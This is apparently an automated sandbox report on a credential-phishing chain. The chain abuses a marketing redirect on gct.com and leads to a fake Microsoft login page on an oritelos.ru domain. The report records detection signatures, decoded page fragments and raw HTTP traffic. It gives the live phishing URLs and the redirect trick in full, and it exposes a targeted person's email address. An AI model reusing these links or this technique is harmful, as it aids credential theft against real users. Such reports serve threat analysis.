Edit tour

Windows Analysis Report
http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475&p1=debssiebeads.co.ke/wp/#?email=aWFuLmhhbmNvY2tAYmFlc3lzdGVtcy5jb20=

Overview

General Information

Sample URL:http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&b
Analysis ID:1449494
Infos:

Detection

HTMLPhisher
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
Yara detected HtmlPhish62
AI detected suspicious javascript
HTML page contains suspicious base64 encoded javascript
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
HTTP GET or POST without a user agent
Invalid T&C link found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 3264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1708,i,9045649938219728694,6714162670049641950,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475&p1=debssiebeads.co.ke/wp/#?email=aWFuLmhhbmNvY2tAYmFlc3lzdGVtcy5jb20=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_109JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    1.2.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
      3.4.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
        3.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          4.5.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
            4.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: https://f8gxf.oritelos.ruLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://f8gxf.oritelos.ru' does not match the legitimate domain 'microsoft.com'. The page mimics a Microsoft login page, which is a common tactic in phishing attacks. The domain name is suspicious and not associated with Microsoft. The presence of a login form on a suspicious domain further indicates phishing. DOM: 3.4.pages.csv
              Source: https://f8gxf.oritelos.ruLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://f8gxf.oritelos.ru' is highly suspicious as it does not match the legitimate domain 'microsoft.com' associated with Microsoft. The page mimics the Microsoft login page, which is a common social engineering technique used in phishing attacks. The presence of a login form on a suspicious domain further indicates a high risk of phishing. DOM: 4.5.pages.csv
              Source: Yara matchFile source: 3.4.pages.csv, type: HTML
              Source: Yara matchFile source: 4.5.pages.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_109, type: DROPPED
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: Yara matchFile source: 3.4.pages.csv, type: HTML
              Source: Yara matchFile source: 4.5.pages.csv, type: HTML
              Source: https://debssiebeads.co.ke/wp/?jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475#?email=aWFuLmhhbmNvY2tAYmFlc3lzdGVtcy5jb20=LLM: Score: 8 Reasons: The code extracts a base64-encoded email parameter from the URL, decodes it, and then redirects the user to a potentially suspicious URL ('https://f8gxf.oritelos.ru/hIzc6w/#D' + email). This behavior is indicative of phishing or other malicious activity, as it involves capturing user information and redirecting to an untrusted domain. DOM: 0.0.pages.csv
              Source: https://f8gxf.oritelos.ru/hIzc6w/#Dian.hancock@baesystems.comHTTP Parser: Base64 decoded: <script>
              Source: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGMatcher: Found strong image similarity, brand: MICROSOFT
              Source: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGMatcher: Template: microsoft matched
              Source: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG#Matcher: Template: microsoft matched
              Source: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGHTTP Parser: Number of links: 0
              Source: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://f8gxf.oritelos.ru/hIzc6w/#Dian.hancock@baesystems.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...
              Source: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGHTTP Parser: Title: zyjdiXeqdO does not match URL
              Source: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGHTTP Parser: Invalid link: Terms of use
              Source: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGHTTP Parser: Invalid link: Privacy & cookies
              Source: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGHTTP Parser: <input type="password" .../> found
              Source: https://f8gxf.oritelos.ru/hIzc6w/#Dian.hancock@baesystems.comHTTP Parser: No favicon
              Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normalHTTP Parser: No favicon
              Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normalHTTP Parser: No favicon
              Source: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGHTTP Parser: No favicon
              Source: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGHTTP Parser: No <meta name="author".. found
              Source: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGHTTP Parser: No <meta name="copyright".. found
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp/?jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475 HTTP/1.1Host: debssiebeads.co.keConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: debssiebeads.co.keConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://debssiebeads.co.ke/wp/?jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /hIzc6w/ HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://debssiebeads.co.ke/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://f8gxf.oritelos.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://f8gxf.oritelos.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/695da7821231/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://f8gxf.oritelos.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://f8gxf.oritelos.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=88bdfe512e5d4301 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f8gxf.oritelos.ru/hIzc6w/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik11Z0FaT29QLzNyb3R2OFhaek5PaXc9PSIsInZhbHVlIjoidmZyeXN3T29GQi9PR2NVeGlUc0I1MDgrZTdOcHhsVDg2ZVdWQWxEMWRMTXVFUDhzZ01HbVNEa3M5YVJ2SFhLSGowSVl5ZVJKaFl2WEZjbnU5S1JTQlFEWWVpR3dUcjAxb3hsTFIwVnR4NktsTEZ3QXdySVVRaDRnaW9IREFVZEciLCJtYWMiOiJlYmEwNDA3ZTA5MWMzNDkyOWU4NzJjNjAwYzc0Y2E5MjcwYzNkYWJjMTM0NzhlODJkOTQxM2FiNWUzMzI0ZjIzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImJjemp5S1NUVmtQZ1lnVlcyMWxaQ0E9PSIsInZhbHVlIjoiL09WM1BCbjgwS2lSRmxzaDQ2ZmR0R0RxSVZveFBMZEhhQmovTWcyUGx0K29hQnN3RmlGUUJZRnNHc0h4bS9qeEFtTzd5OXlCVDNTek90RGxYalUweldNOWp1WWdFTjNBS1ZZS1dVendlQ2tRSFZrZWNCR2Zud3Q3VE1xZWkzLzUiLCJtYWMiOiI2ZjdiYzFhZWY0MmZkYmFiZjM0ODVkZGU5NmI4N2U1NjIwMjc4NDkzNjc5NmJlY2Y2MzI0Mjc3MTEyODViY2JiIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/88bdfe512e5d4301/1717064447602/jhAXgwYP39WVSiq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1135982147:1717061463:XHQuHvT4Va6wHyLXdOitYbqFIsyDOYHyVnGn1136xl8/88bdfe512e5d4301/f67bea3da7e6db1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/88bdfe512e5d4301/1717064447602/jhAXgwYP39WVSiq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/88bdfe512e5d4301/1717064447606/48c2e462596e41e6aece842ae2c08996563e372a9ba82b16283e4c2b9f90bbdc/IFmMzoC7W5cO3ct HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1135982147:1717061463:XHQuHvT4Va6wHyLXdOitYbqFIsyDOYHyVnGn1136xl8/88bdfe512e5d4301/f67bea3da7e6db1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1135982147:1717061463:XHQuHvT4Va6wHyLXdOitYbqFIsyDOYHyVnGn1136xl8/88bdfe512e5d4301/f67bea3da7e6db1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /hIzc6w/ HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://f8gxf.oritelos.ru/hIzc6w/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imt0TFhad2ZVSzZVcmpaVDJSMFpLaHc9PSIsInZhbHVlIjoidDJUOFRVcUdRS0FGSVR5VWJJTGxQUFlrWktpSVBqME10amZYZlVDeGgwTE1BYmRQMnpqVWVXL2RNdDN6M3hRQ0pJSVZ5SHJ2RGUwYThIMzN2WFZ0RFBkKzU1TDhvRVdaSW1Da3FQQnRBMVFSV3ZUbXQ1SUpwdE9BZ0hhSlJqWjYiLCJtYWMiOiI3MjliNzBiOGMxYWM1YTlhMjJkZjMyMWZiZjFhYzdkOTdmN2VmMDQ0ZjEzODViZDg0MTQzN2JkMmJkN2ZkZjBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik52OHRmTUVGb1ljVG1NN09SSTEyc1E9PSIsInZhbHVlIjoibUZYbWRKTjk0SnpQWDhaUUl1Q3lOb05MMFIybTBKKzBhR2pKNitEcERjeUw3R0czYnNhOGhBZkhLMjVhenY1NVpIVGZaOWVXQXpER1FEMnVPbVhLL2IzbTlaSWN6SnEwa3dNQjVUNzhXd0lHTGMzS09SVDFYbCs0SWZCVnBib0YiLCJtYWMiOiIwZWI0M2M5YjI0NjJmYTFiMmIyNDM0ZjgzMjE4YjRjMDY4ZTZjODUxMjcyZmQxNmY4Njk0MzcwM2JjMWM5YmRkIiwidGFnIjoiIn0%3D
